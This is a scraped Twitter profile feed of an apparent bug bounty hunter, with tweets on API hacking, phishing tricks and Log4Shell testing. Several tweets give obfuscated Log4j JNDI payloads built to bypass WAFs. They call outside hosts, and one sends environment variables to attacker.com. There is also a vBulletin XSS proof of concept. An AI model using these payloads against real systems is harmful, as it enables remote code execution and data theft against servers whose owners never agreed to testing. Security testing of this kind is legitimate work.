Ahmed Mehtab @ahmedmehtabpk
AppSec engineer @afiniti / Into Bug Bounty Hunting & InfoSec #speaker #cybersecurity #penetrationtester
Joined October 2013
Tweets: 492 | Followers: 199 | Following: 266 | Likes: 487
It's only been 2 hours since Open AI launched GPT-4o, and people are going crazy over it. Here are 10 wild examples you don't want to miss: 1. Math Problems with GPT-4o
This year has been really great to me, ranked 4th in @Sophos so far. #bugcrowd #BugBounty #sophos
If you want to master API security, open this thread! APIs are used EVERYWHERE for applications to communicate, but let's see how you can HACK them! 👩💻 A Thread 🧵👇
Ranked 8th in @Sophos hof #sophos #BugBounty #bugcrowd
Pretty neat phishing technique I haven't received before. Attackers filled out a Google Form with my email and abused the "Send me a copy of my response" feature.
Ben @NahamSec does an awesome writeup of how leaked credentials make it to public repos and how to find them as a bounty hunter with the new TruffleHog release! Complete with an interview of @InsecureNature on the new engine! youtube.com/watch?v=gkKLV-…
A researcher warns of a new "browser-in-the-browser" (BITB) technique that could allow attackers to spoof a legitimate domain to launch nearly undetectable #phishing attacks and steal credentials. Read details: thehackernews.com/2022/03/new-br… #infosec #cybersecurity #technews
$7500 payout this week between 3 vulns! #bugbountytips I’ve been recently enjoying content discovery and appending unusual characters at the end of the file name to mess around with the parser logic, my typical winners are appending a “;” or “/” at the end of a file name
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. googleprojectzero.blogspot.com/2021/12/a-deep…
Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who cares to share Akamai Bypass? #bugbountytips
Since the final fix for the #log4j RCE vulnerability is out — I'm finally open-sourcing a scanning toolkit for CVE-2021-44228 that I developed over the weekend. Features include automatic Canary Tokens generation, request customization and many others. :) github.com/0xInfection/Lo…
You can use a point & click canarytoken from canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string...
Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip
I see people reporting Tesla and Apple vulnerable based on DNS queries. These could be done by any device in the path (i.e. a WAF, IPS, SIEM). Hint: use a name that will confirm resolution worked such as this: ${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
How to test your apps for #log4shell vulnerability 1. Generate a DNS token canarytokens.org/generate# 2. Wrap that token in Prefix: ${jndi:ldap:// Suffix: /a} 3. Use that value in search forms, profile data, settings etc. of your apps 4. Get notified when you triggered a reaction
🔥 The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher @Psych0tr1a. PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory: vbulletin.org/forum/showthre…
@BountyOverflow this is one of tricks to bypass 403
Testing an e-commerce checkout? Try a test credit card number like "4242 4242 4242 4242" on a production site. Test responsibly & report it if it works 🙋🏽♂️ 🙋🏽♀️ More details on testing card numbers for Stripe integrations 💳👇 stripe.com/docs/testing #BugBountyTips
